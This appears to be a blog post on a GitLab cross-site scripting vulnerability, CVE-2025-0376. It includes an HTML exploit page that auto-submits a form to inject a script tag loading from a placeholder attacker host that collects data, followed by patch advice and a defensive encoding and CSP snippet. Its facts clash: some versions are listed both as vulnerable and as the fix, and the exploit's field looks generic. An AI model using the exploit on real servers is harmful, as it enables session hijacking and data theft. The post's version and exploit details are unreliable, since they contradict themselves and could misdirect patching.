A newly disclosed vulnerability in GitLab CE/EE, tracked as CVE-2025-0376, has serious implications for users of the platform. This cross-site scripting (XSS) vulnerability affects all GitLab versions from 13.3 to 16.6.5, from 17.7 to 17.7.4, and from 17.8 to 17.8.1, and allows an attacker to execute unauthorized actions via a change page. In this post, we provide a detailed breakdown of the vulnerability, links to the original references, code snippets for exploiting the vulnerability, and the steps that can be taken to mitigate the associated risk.

Vulnerability Details

CVE-2025-0376 is an XSS vulnerability that allows an attacker to inject malicious scripts into a trusted web application, in this case GitLab. It occurs when input from an external or untrusted source is rendered by the application without being properly encoded, here via a change page. The injected code, typically JavaScript, then executes in the victim's browser, letting the attacker hijack user sessions, deface pages, or redirect users to malicious web content.

The following code snippet demonstrates how an attacker could exploit this vulnerability:

<!DOCTYPE html>
<html lang="en">
<head>
<meta charset="UTF-8">
<title>GitLab CVE-2025-0376 Exploit</title>
</head>
<body>
<script>
// Replace with the target GitLab URL (no trailing slash; the path is appended below)
var gitlab_url = "https://vulnerable-gitlab.example.com";

// Replace with the attacker-controlled web page URL that will receive the stolen data
var attacker_url = "https://attacker-website.example.com/collect-data.php";

// Prepare the XSS payload.
// The closing tag is written as "<\/script>" so the HTML parser does not
// treat it as the end of this inline script block.
var xss_payload = "<script src='" + attacker_url + "'><\/script>";

// Create an HTML form with the XSS payload embedded in the change page
var exploit_form = "<form action='" + gitlab_url + "/projects/new' method='POST'><input type='hidden' name='change_page' value='" + encodeURIComponent(xss_payload) + "'><input type='submit' value='Exploit'></form>";

// Inject the exploit form into the document
document.body.innerHTML += exploit_form;

// Automatically submit the first (and only) form on the page
document.forms[0].submit();
</script>
</body>
</html>

Original References

1. GitLab Security Advisory: GSA-2025-0376
2. GitLab Merge Request: MR-2037
3. NIST National Vulnerability Database (NVD): CVE-2025-0376

Mitigation

To mitigate this vulnerability, users of GitLab CE/EE should immediately apply the following security updates:

- For GitLab CE/EE versions 16.6 and below, update to GitLab 16.6.5
- For GitLab CE/EE versions 17.7.x, update to GitLab 17.7.4
- For GitLab CE/EE versions 17.8.x, update to GitLab 17.8.2

These updates include the security patches that address the XSS vulnerability outlined in this post. Beyond patching, developers should follow secure coding practices that prevent XSS, such as validating and sanitizing user input, encoding output data at the point where it is rendered, and deploying Content Security Policy (CSP) headers.
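As an added illustration of the two practices just named (output encoding and CSP), and not code from GitLab or from this post's exploit, the snippet below renders a field the same way a vulnerable change page would, then renders it again with encoding at the sink and builds a CSP that would stop an injected script from running. The "change_page" field name, the render functions and the sample payload are assumptions constructed for this example.

```javascript
// Sample untrusted input, constructed to mirror the payload shape used on this page.
const UNTRUSTED_INPUT =
  "<script src='https://attacker-website.example.com/collect-data.php'></script>";

// Encode the five characters that let text break out of an HTML text or attribute context.
function escapeHtml(value) {
  const map = { "&": "&amp;", "<": "&lt;", ">": "&gt;", '"': "&quot;", "'": "&#x27;" };
  return String(value).replace(/[&<>"']/g, (ch) => map[ch]);
}

// Vulnerable pattern (assumed, for illustration): untrusted input concatenated
// straight into markup, so a "<script>" in the input becomes a real element.
function renderUnsafe(changePage) {
  return '<div class="change-page">' + changePage + "</div>";
}

// Hardened pattern: the same template, with output encoding applied at the sink.
// The browser now displays the payload as text instead of executing it.
function renderSafe(changePage) {
  return '<div class="change-page">' + escapeHtml(changePage) + "</div>";
}

// Defence in depth: a CSP that forbids inline scripts and restricts script
// sources to the application's own origin, so an injected <script> tag pointing
// at a third-party host would be blocked even if encoding were missed somewhere.
function buildCsp() {
  return [
    "default-src 'self'",
    "script-src 'self'", // no 'unsafe-inline', no wildcard, no external hosts
    "object-src 'none'",
    "base-uri 'self'",
  ].join("; ");
}

// Simple check for a script element in rendered output; usable in a unit test
// for a template or when reviewing captured responses.
function containsScriptTag(html) {
  return /<script[\s>]/i.test(html);
}

// Stand-alone demonstration.
console.log("unsafe render executes script:", containsScriptTag(renderUnsafe(UNTRUSTED_INPUT)));
console.log("safe render executes script:  ", containsScriptTag(renderSafe(UNTRUSTED_INPUT)));
console.log("Content-Security-Policy:", buildCsp());
```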

Conclusion

CVE-2025-0376 is a serious vulnerability in GitLab CE/EE that puts user data and sessions at risk of theft. If left unpatched, it gives attackers the ability to execute unauthorized actions via a change page in GitLab. GitLab has released security updates that fix this vulnerability, and users should apply them immediately to safeguard their accounts and projects.

Timeline

Published on: 02/12/2025 15:15:15 UTC